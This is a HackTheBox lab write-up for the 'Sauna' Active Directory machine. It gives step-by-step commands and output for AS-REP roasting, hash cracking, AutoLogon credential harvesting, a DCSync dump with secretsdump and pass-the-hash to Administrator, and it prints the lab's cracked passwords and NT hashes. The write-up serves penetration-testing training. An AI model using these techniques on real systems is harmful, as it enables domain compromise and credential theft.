~/writeups/Sauna
Easy Windows Active Directory
Sauna.
Easy Windows Active Directory AS-REP Roasting DCSync AutoLogon HackTheBox
Beginner-friendly Active Directory machine teaching a classic real-world attack chain: harvest employee names from a public website, generate AD username candidates, AS-REP Roast a user with pre-authentication disabled, find plaintext credentials in the Windows AutoLogon registry key, then perform a DCSync attack via GetChangesAll to dump all domain hashes and pass-the-hash as Administrator.
User Flag
5552b074550axxxxxxxxxxxxxxxxxxxx
Root Flag
01d83bce08bbxxxxxxxxxxxxxxxxxxxx
01Reconnaissance — Nmap

Full port scan against the target. The open ports immediately identify this as a Domain Controller.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.35.227 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos 389/tcp open ldap Active Directory (Domain: EGOTISTICAL-BANK.LOCAL) 445/tcp open microsoft-ds SMB 5985/tcp open http WinRM
DC confirmed: ports 88 (Kerberos) + 389 (LDAP) + 53 (DNS) = Domain Controller. Domain: EGOTISTICAL-BANK.LOCAL. Port 5985 (WinRM) open — valid credentials will give us a shell.
02Web Enumeration — Harvesting Employee Names

Browsing http://10.129.35.227 reveals the Egotistical Bank website. The About page lists the full names of team members — valuable for generating AD username candidates.

team.txt — names from the website
fergus smith shaun coins sophie driver bowie taylor hugo bear steven kerb
why this matters: AD usernames are almost always derived from real names (fsmith, fergus.smith, f.smith, etc.). Harvesting names from a public-facing site is a zero-noise recon technique — no login, no alerts.
03Username Generation — username-anarchy

username-anarchy takes real names and generates every common AD username format automatically — fsmith, fergus.smith, smithf, fergussmith, and dozens more per person.

username-anarchy
$ ./username-anarchy --input-file team.txt > usernames.txt
04AS-REP Roasting — GetNPUsers

When Kerberos pre-authentication is disabled on an account, anyone can request its TGT without knowing the password. The DC responds with a ticket encrypted with the account's password hash — which we can crack offline. No lockout risk, no network noise.

impacket-GetNPUsers — test all username candidates
$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.129.35.227 -no-pass -usersfile usernames.txt [-] KDC_ERR_C_PRINCIPAL_UNKNOWN — username doesn't exist [-] KDC_ERR_C_PRINCIPAL_UNKNOWN — username doesn't exist $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:fe7f2dbf... ← HASH CAPTURED [-] KDC_ERR_C_PRINCIPAL_UNKNOWN — username doesn't exist
hit: fsmith (Fergus Smith) has pre-authentication disabled. AS-REP hash captured — crack it offline.
hashcat — mode 18200 (Kerberos AS-REP)
$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:...:Thestrokes23
05Foothold — Evil-WinRM as fsmith

WinRM (port 5985) is open. fsmith's cracked credentials give us an interactive shell.

evil-winrm → user flag
$ evil-winrm -i 10.129.35.227 -u fsmith -p 'Thestrokes23' *Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt 5552b074550axxxxxxxxxxxxxxxxxxxx
06Post-Exploitation — WinPEAS & AutoLogon Credentials

fsmith is a regular user. Upload WinPEAS to enumerate privilege escalation paths — it checks hundreds of misconfigurations including stored credentials, vulnerable services, and registry keys.

upload and run WinPEAS
*Evil-WinRM* PS C:\> upload /home/kali/winPEASany.exe winp.exe *Evil-WinRM* PS C:\> ./winp.exe
WinPEAS output — AutoLogon credentials
Looking for AutoLogon credentials DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround!
AutoLogon: Windows stores auto-login credentials in plaintext at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. WinPEAS always checks here — it's a classic finding in real engagements too.

The registry shows svc_loanmanager but the actual AD account is svc_loanmgr — a common discrepancy.

validate svc_loanmgr credentials
$ nxc smb 10.129.35.227 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! $ nxc winrm 10.129.35.227 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)

Run BloodHound as svc_loanmgr to map AD attack paths.

BloodHound collection
$ bloodhound-python -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' -d EGOTISTICAL-BANK.LOCAL -ns 10.129.35.227 -c All --zip
BloodHound finding: svc_loanmgr has GetChangesAll (DS-Replication-Get-Changes-All) over the domain — the permission DCs use to replicate with each other. This allows a full DCSync attack.
07Privilege Escalation — DCSync

GetChangesAll lets us impersonate a Domain Controller and pull every user's password hash from the domain. We run secretsdump remotely from Kali — no need to be on the machine.

impacket-secretsdump — DCSync
$ impacket-secretsdump 'EGOTISTICAL-BANK.LOCAL'/'svc_loanmgr':'Moneymakestheworldgoround!'@'10.129.35.227' Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:... HSmith:1103:... FSmith:1105:... svc_loanmgr:1108:...
Administrator NT hash: 823452073d75b9d1cf70ebdf86c7f98e — format is username:RID:LM_hash:NT_hash:::. We don't need to crack it.
08Domain Compromise — Pass-the-Hash as Administrator

In Windows environments, the NTLM hash IS the credential. We can authenticate using it directly without cracking — this is Pass-the-Hash (PtH).

verify hash → shell → root flag
$ nxc smb 10.129.35.227 -u 'administrator' -H '823452073d75b9d1cf70ebdf86c7f98e' [+] EGOTISTICAL-BANK.LOCAL\administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!) $ evil-winrm -i 10.129.35.227 -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e' *Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt 01d83bce08bbxxxxxxxxxxxxxxxxxxxx
attack chain summary
[Website] Employee names → username-anarchy │ ▼ GetNPUsers (AS-REP Roasting)fsmith AS-REP hash → hashcat -m 18200 → fsmith:Thestrokes23 │ ▼ Evil-WinRM as fsmith → user.txt ✓ WinPEAS → AutoLogon registry key → svc_loanmgr:Moneymakestheworldgoround! │ ▼ BloodHound → svc_loanmgr has GetChangesAll secretsdump (DCSync)Administrator NT hash │ ▼ Pass-the-Hash → Evil-WinRM → root.txt ✓
key takeaways:
· Employee names on public sites → valid AD usernames — always enumerate web before touching AD
· AS-REP Roasting needs no credentials and causes no lockouts — test all username candidates
· AutoLogon stores plaintext passwords in the registry — WinPEAS finds this automatically
· GetChangesAll = DCSync = full domain compromise — flag it as critical in any assessment
· NTLM hashes are usable credentials — cracking is optional when you can pass-the-hash
← all writeups